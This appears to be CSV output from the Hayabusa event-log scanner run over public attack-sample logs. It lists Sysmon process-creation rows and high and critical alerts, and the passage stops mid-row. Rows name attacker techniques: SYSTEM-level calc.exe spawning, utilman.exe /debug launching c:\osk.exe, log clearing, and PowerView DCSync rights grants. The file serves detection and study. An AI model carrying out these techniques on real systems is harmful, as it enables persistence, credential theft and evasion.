365ABB72-77C0-5C91-0000-00106C740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 316 | PGUID: 365ABB72-7856-5C91-0000-00109FE20100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.594 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x17dad | PID: 1028 | PGUID: 365ABB72-785E-5C91-0000-001031E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.654 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1152 | PGUID: 365ABB72-785E-5C91-0000-0010C5E60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.725 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x17dad | PID: 1928 | PGUID: 365ABB72-785E-5C91-0000-00103FEA0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.805 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 256 | PGUID: 365ABB72-7874-5C91-0000-0010F1020200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1264 | PGUID: 365ABB72-7874-5C91-0000-0010130B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:55.965 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 988 | PGUID: 365ABB72-7892-5C91-0000-0010DE160200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 584 | PGUID: 365ABB72-7893-5C91-0000-0010441C0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.055 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 832 | PGUID: 365ABB72-78B1-5C91-0000-001001300200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.376 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1736 | PGUID: 365ABB72-78CF-5C91-0000-0010F23A0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:56.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1596 | PGUID: 365ABB72-78CF-5C91-0000-0010BE4B0200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:57.237 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2180 | PGUID: 365ABB72-78D0-5C91-0000-00108A650200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:57.627 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 2332 | PGUID: 365ABB72-78D0-5C91-0000-0010F6710200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.278 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2572 | PGUID: 365ABB72-78D2-5C91-0000-0010D8A50200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.288 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 2584 | PGUID: 365ABB72-78D2-5C91-0000-0010FFAB0200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.489 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x17dad | PID: 2692 | PGUID: 365ABB72-78D3-5C91-0000-0010B0D30200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:18:58.989 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2844 | PGUID: 365ABB72-78D6-5C91-0000-0010CE170300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:04.187 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3188 | PGUID: 365ABB72-78E8-5C91-0000-001054030400,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:19:10.796 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3328 | PGUID: 365ABB72-78EE-5C91-0000-0010273F0400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x17dad | PID: 3496 | PGUID: 365ABB72-7933-5C91-0000-00100AD30600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\system32\utilman.exe | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 3508 | PGUID: 365ABB72-7933-5C91-0000-0010B7D40600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""c:\osk.exe"" | Process: C:\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x17dad | PID: 3520 | PGUID: 365ABB72-7933-5C91-0000-00103CDB0600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3836 | PGUID: 365ABB72-795D-5C91-0000-00105C070700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x17dad | PID: 2004 | PGUID: 365ABB72-798B-5C91-0000-0010C8550A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x17dad | PID: 3428 | PGUID: 365ABB72-79FC-5C91-0000-0010DBC60A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:24:08.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,Evas,System Log File Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx 2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Evas,Security Log Cleared,User: user01,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx 2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx 2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,info,,Process Created,"Cmd: ""C:\Users\user01\Desktop\WMIGhost.exe"" | Process: C:\Users\user01\Desktop\WMIGhost.exe | User: PC04\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xaaf2b | PID: 3328 | PGUID: 